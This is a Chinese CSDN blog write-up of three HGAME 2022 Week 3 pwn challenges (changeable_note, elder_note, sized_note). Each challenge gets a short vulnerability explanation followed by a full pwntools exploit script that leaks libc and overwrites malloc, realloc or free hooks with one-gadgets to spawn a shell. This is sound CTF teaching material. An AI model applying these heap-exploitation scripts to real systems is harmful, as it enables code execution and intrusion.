PWN-COMPETITION-HGAME2022-Week3

最新推荐文章于 2024-07-25 10:00:08 发布
最新推荐文章于 2024-07-25 10:00:08 发布
阅读量2.6k 收藏
点赞数
分类专栏: Pwn-Competition 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122784571
版权

PWN-COMPETITION-HGAME2022-Week3

changeable_note

edit_note中的gets函数存在堆溢出漏洞
本题没有leak函数,考虑利用_IO_2_1_stdout泄露libc
参考:好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc(补题)HITCON 2018 PWN baby_tcache超详细讲解
参考文章中的题目libc版本为2.27,从tcache中分配chunk不会检查size域,可以很方便利用
本题的libc版本为2.23,从fastbin中分配chunk时会检查size域是否正确,故须小心选择各chunk大小

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
io=process("./changeable_note")
#io=remote("chuj.top",52576)
elf=ELF("./changeable_note")
libc=ELF("./libc-2.23.so")

#gdb.attach(io)
#pause()

#io.recvuntil("sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#charset = string.printable
#proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
#io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("index?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))
	io.sendafter("content?\n>> ",content)
def edit(index,content):
	io.sendlineafter(">> ","2")
	io.sendlineafter("index?\n>> ",str(index))# heap overflow
	io.send(content)
def free(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("index?\n>> ",str(index))

#pause()

add(0,0x90-8,"a"*8+"\n")#0
add(1,0x70,"a"*8+"\n")#1
add(2,0x60,"a"*8+"\n")#2
add(3,0x40,"a"*8+"\n")#3
add(4,0x10,"a"*8+"\n")#4
add(5,0x90-8,"a"*8+"\n")#5
add(6,0x70,"a"*8+"\n")#6

#pause()

size=0x90+0x20+0x50+0x70+0x80
print("size=="+hex(size))
payload="b"*0x10+p64(size)+p64(0x90)+"\n"
edit(4,payload)

#pause()

free(2)#2 out

#pause()

free(0)#0 out

#pause()

free(5)#5 out

#pause()

add(0,0x90+0x80-0x10,"c"*8+"\n")#0

#pause()

free(4)#4 out

#pause()

add(7,0x70+0x50-0x10,"\xdd\xb5")#7,找到一个地址比_IO_2_1_stdout低的,size域为0x7f的prev_size地址

#pause()

payload="d"*0x70+p64(0)+p8(0x71)+"\n"
edit(1,payload)#利用堆溢出调整chunk2的size域为0x71,使其能从fastbin中被取出

#pause()

add(2,0x60,"d"*8+"\n")#2

#pause()

payload=p64(0)*6+p8(0)*3+p64(0xFBAD1800)+p64(0)*3+"\x00"
add(4,0x60,payload)#4,这里是已经malloc过去了,可能pwngdb看不到p64(0)*3和"\x00"写过去了,但是确实是可以泄露libc的

#pause()

libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x3c5600
print("libc_base=="+hex(libc_base))
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[1]
print("ogg=="+hex(ogg))
__malloc_hook=libc_base+libc.sym["__malloc_hook"]
print("__malloc_hook=="+hex(__malloc_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))

#pause()

add(5,0xb0-0x10,"e"*8+"\n")

#pause()

###########################################################################

add(8,0x90-8,"a"*8+"\n")#8
add(9,0x70,"a"*8+"\n")#9
add(10,0x60,"a"*8+"\n")#10
add(11,0x40,"a"*8+"\n")#11
add(12,0x20,"a"*8+"\n")#12
add(13,0x90-8,"a"*8+"\n")#13
add(14,0x70,"a"*8+"\n")#14

#pause()

size=0x90+0x30+0x50+0x70+0x80
print("size=="+hex(size))
payload="b"*0x20+p64(size)+p64(0x90)+"\n"
edit(12,payload)

#pause()

free(10)#10 out

#pause()

free(8)#8 out

#pause()

free(13)#13 out

#pause()

add(8,0x90+0x80-0x10,"c"*8+"\n")#8

#pause()

free(12)#12 out

#pause()

add(15,0x70+0x50-0x10,p64(__malloc_hook-0x23))#15,__malloc_hook头上的经典size域为0x7f的prev_size地址

#pause()

payload="d"*0x70+p64(0)+p8(0x71)+"\n"
edit(9,payload)#利用堆溢出调整chunk10的size域为0x71,使其能从fastbin中被取出

#pause()

add(10,0x60,"d"*8+"\n")#10

#pause()

payload=p8(0)*3+p64(0)+p64(ogg)+p64(realloc)
add(12,0x60,payload)#12,写__realloc_hook为one-gadget,__malloc_hook为realloc真实地址(调整栈帧)

#pause()

io.sendlineafter(">> ","1")
io.sendlineafter("index?\n>> ",str(16))
io.sendlineafter("size?\n>> ",str(0x10))

io.sendline("cat flag")

io.interactive()

elder_note

delete_note中存在UAF漏洞
首先利用unsorted bin泄露libc
然后通过double free覆盖__realloc_hook为one-gadget,__malloc_hook为realloc真实地址(调整栈帧)

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
io=process("./elder_note")
#io=remote("chuj.top",52769)
elf=ELF("./elder_note")
libc=ELF("./libc-2.23.so")

#gdb.attach(io)
#pause()

#io.recvuntil("sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#charset = string.printable
#proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
#io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("index?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))
	io.sendlineafter("content?\n>> ",content)
def show(index):
	io.sendlineafter(">> ","2")
	io.sendlineafter("index?\n>> ",str(index))
def free(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("index?\n>> ",str(index))

#pause()

add(0,0x100,"a"*8)
add(1,0x60,"b"*8)
add(2,0x60,"c"*8)
add(3,0x20,"/bin/sh\x00")

#pause()

free(0)

#pause()

show(0)
main_arena=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-88
print("main_arena=="+hex(main_arena))
__malloc_hook=main_arena-0x10
print("__malloc_hook=="+hex(__malloc_hook))
libc_base=__malloc_hook-libc.sym["__malloc_hook"]
print("libc_base=="+hex(libc_base))
__free_hook=libc_base+libc.sym["__free_hook"]
print("__free_hook=="+hex(__free_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))
oggs=[0x45226,0x4527a,0xf03a4,0xf1247]
ogg=libc_base+oggs[1]
print("ogg=="+hex(ogg))

#pause()

free(1)

#pause()

free(2)

#pause()

free(1)

#pause()

add(4,0x60,p64(__malloc_hook-0x23))

#pause()

add(5,0x60,"d"*8)

#pause()

add(6,0x60,"e"*8)

#pause()

add(7,0x60,p8(0)*3+p64(0)+p64(ogg)+p64(realloc))

#pause()

io.sendlineafter(">> ","1")
io.sendlineafter("index?\n>> ","8")
io.sendlineafter("size?\n>> ",str(0x10))

io.interactive()

sized_note

add和edit两个函数中都存在off by null漏洞
参考:2021第四届强网拟态PWN-wp 中old_school_revenge一题

# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
#io=process("./sized_note")
io=remote("chuj.top",52833)
elf=ELF("./sized_note")
libc=ELF("./libc.so.6")

#gdb.attach(io)
#pause()

io.recvuntil("sha256(????) == ")
code=io.recvuntil("\n")[:-1]
charset = string.printable
proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
io.sendlineafter("????> ",proof)

def add(index,size,content):
	io.sendlineafter(">> ","1")
	io.sendlineafter("index?\n>> ",str(index))
	io.sendlineafter("size?\n>> ",str(size))
	io.sendafter("content?\n>> ",content)
def show(index):
	io.sendlineafter(">> ","2")
	io.sendlineafter("index?\n>> ",str(index))
def free(index):
	io.sendlineafter(">> ","3")
	io.sendlineafter("index?\n>> ",str(index))
def edit(index,content):
	io.sendlineafter(">> ","4")
	io.sendlineafter("index?\n>> ",str(index))
	io.send(content)

#pause()

for i in range(7):
	add(i,0xf8,"\n")

add(7,0xf8,"\n")
add(8,0xf8,"\n")
add(9,0xf8,"\n")
add(10,0xf8,"\n")

for i in range(7):
	free(i)

free(7)

#pause()

payload="\x00"*0xf0+p64(0x200)
edit(8,payload)

#pause()

free(9)

for i in range(7):
	add(i,0xf8,"\n")

#pause()

add(16,0xf8,"\n")
show(8)
libc_base=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-0x3EBCA0
print("libc_base=="+hex(libc_base))
__malloc_hook=libc_base+libc.sym["__malloc_hook"]
print("__malloc_hook=="+hex(__malloc_hook))
__free_hook=libc_base+libc.sym["__free_hook"]
print("__free_hook=="+hex(__free_hook))
realloc=libc_base+libc.sym["realloc"]
print("realloc=="+hex(realloc))
oggs=[0x4f3d5,0x4f432,0x10a41c]
ogg=libc_base+oggs[1]
print("ogg=="+hex(ogg))

#pause()

add(12,0x60,"\n")
free(12)

#pause()

edit(8,p64(__free_hook))

#pause()

add(13,0x60,"\n")
add(14,0x60,"\n")

#pause()

edit(14,p64(ogg))

#pause()

free(0)

io.sendline("cat flag")

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
REVERSE-COMPETITION-HGAME2022-Week3
P1umH0的博客
02-13 2499
REVERSE-COMPETITION-HGAME2022-Week3Answer's Windowscreakme3hardenedfishman Answer’s Windows 含有GUI的程序,ida打开,Shift+F12打开字符串窗口 发现"right"和"wrong" 对"right"查找交叉引用,来到sub_140002300函数 分析知道sub_140001F90是个变表base64,但是不知道变表 启调试,在如下图所示处下断,这里是生成变表的地方 调试时修改ZF标志位使程序能够执行i
2022 hgame pwn wp
weixin_45209963的博客
03-27 4694
2022 hgame pwn wp 本来早就写好了,但是由于复试毕设等等原因拖到今天才发 包括了绝大部分题目,除了算法题spfa和bpwn,剩下一些简单题懒得写了orz 文章目录2022 hgame pwn wpWeek 1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orwWeek 2oldfashion_noteechoWeek 3changeable_noteelder_notesized_noteWeek 4vector Week 1 ent
[HGAME 2022 week3]RSA attack 3(维纳攻击)
2302_80322812的博客
05-23 244
从题目中我们看出,e 非常大,且d很小只有64位(小于 n^(1/4)),故猜测使用维纳攻击破解。
hgame 2022 PWN 部分题目 Writeup
02-18 3342
hgame 2022 pwn 部分题目writeup
PWN-COMPETITION-HGAME2022-Week1
P1umH0的博客
01-28 1258
PWN-COMPETITION-HGAME2022Week1enter_the_pwn_landenter_the_evil_pwn_landoldfashion_orw(unsolved)ser_per_fa(unsol)test_your_nctest_your_gdb Week1 enter_the_pwn_land 栈溢出,需要注意的是下标 i 的地址比输入s的地址更高 s溢出会覆盖 i ,于是需要小心地覆写 i 的值,让循环顺利执行下去 然后就是常规的ret2libc # -*- coding:
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWN-COMPETITION-HGAME2022-Week2
P1umH0的博客
02-04 1793
PWN-COMPETITION-HGAME2022-Week2blind(unsolved)echo_severoldfashion_note blind(unsolved) echo_sever 堆上的格式化字符串漏洞 当输入的v0为0时,realloc(ptr,0)相当于free(ptr) 于是考虑将free_hook写为one-gadget # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" io=process(".
2022年HGAME中CRYPTO的RSA Attack3
沐一 · 林 的博客
04-04 343
2022年HGAME中CRYPTO的RSA Attack3 . . 照例下载附件,照例先 CTF-RSA-tool 工具先行: . . 解毕! 敬礼!
python3使用mbruteforce报错
weixin_52118017的博客
10-21 533
mbruteforce
[RoarCTF2019]RSA
qq_61774705的博客
05-15 730
1.题目 # A=(((y%x)**5)%(x%y))**2019+y**316+(y+1)/x # p=next_prime(z*x*y) # q=next_prime(z) # A = 26833491826787145242474695127934760098610147810049249054841274803081613777681928680615618865770486464323821289608814874634274141761144868858306939594049897432
CTF实战分享 | Crypto-RSA
jennycisp的博客
11-22 926
此时e1在3, 7, 3 * 3, 3 * 7, 7 * 7, 3 * 3 * 7, 3 * 7 * 7, 7 * 7 * 7, 3 * 7 * 7 * 7, 3 * 3 * 7 * 7内取值。先gcd n1 n2 n3两两之间的共享素数然后直接Ф(n1),Ф(n2),Ф(n3),在然后mi=pow(ci,Ф(ni),ni)得到s,t后,求取M=m^gcd(e1, e2) = pow(c1, s, n) * pow(c2, t, n) % n。由于****c = (m ^ e) % n****。
NSS周常刷密码(1)
arcuied
05-22 670
NSS周常刷密码(1)
NSSCTF习题练习
Jsy050906的博客
03-30 631
有意思的是,得到的结果一开始为乱码,但发现flag在最后面最终flag为:NSSCTF{R54_|5_$0_$imp13}
企业如何保证公司内网安全
最新发布
shunyou0526的博客
07-25 288
部署防火墙和入侵检测系统:作为内网安全的第一道防线,防火墙和入侵检测系统能够有效阻止外部攻击和恶意软件的入侵。访问控制与身份验证:实施严格的访问控制策略,结合多因素认证(MFA),确保只有授权用户才能访问关键系统和数据。日志管理:建立全面的日志记录和审计机制,对所有数据访问、修改、删除等操作进行记录,以便于追踪和分析。电脑监控软件:使用电脑监控软件来监控员工的屏幕活动、上网行为等,防止内部威胁和不当使用公司资源。反病毒软件与反间谍软件:部署反病毒软件和反间谍软件等恶意软件防护工具,实时监测和清除恶意软件。
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值